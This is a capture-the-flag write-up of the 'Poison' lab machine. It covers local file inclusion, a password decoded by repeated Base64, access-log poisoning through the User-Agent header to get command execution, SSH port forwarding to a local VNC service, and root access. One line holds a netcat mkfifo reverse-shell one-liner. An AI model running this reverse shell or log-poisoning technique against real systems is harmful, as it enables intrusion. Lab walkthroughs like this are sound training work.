pwdbackup.txt looks interesting

I checked it with CyberChef and didn’t get any “magic” hint. Later I will decode it

There is a LFI
access.log is accessible
I don’t have permissions to access ssh key

Decoded context of response

I just got html instead of php code

I tried again decode password file and I think I got it:

Now is time to find some way to use LFI to get RCE

13x times Base64 decode

And this password actually worked for SSH:

I used same password for zip as for the user. I got unziped secret file which I will follow in priv escalation after doing 2nd way of getting user.flag

I got the user flag, although name of the box is “poison” and there is a valid LFI with access to log files, so probably I am supposed to poison logs to get a RCE or reverse shell.

Firstly, I will try with user agent.

Now double quote:

It looks like every parameter in log file, contains double quote, so using double quote in User Agent actually makes escape of it.
As I said double quote escapes string, so probably now I crashed my way to do this.

To make sure next things will go well, I decided to restart machine. It not good way of doing pentests, but I wanted to check response to this string escape.

After restart httpd-access.log check:



PHP tags disappeared, so the php code has been executed

Next test:

Injected parameter ‘lame’ which should allow to get RCE from browser
added parameter lame=uname -a

Trying to get reverse shell:

I didn’t get answer, redirect part looks like it has been encoded

There is still some issues with encoding I decided to try the other way

Netcat check if connection between me and remote host is possible:

Connection occured. Now I need to modify previous netcat reverse shell to make it executable.


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f

Encoded payload (Burp CTRL+U):


Now I am suppossed to find pwdbackup.txt decode and switch to user charix, which I did before.

I am back to my SSH shell and I run linpeas. There weren’t any obvious way to escalate. I went a few times through the linpeas output and I saw an unusual Xvnc process.

5801 and 5901 ports are listening. They are not accessible from outside

SSH Konami codes:

Notes for future

New line
~C (opens command line)
-D 5801 (forwards port by SSH client)

I need a password
secret file probably is encoded password for vnc
I got the root access

By Marceli

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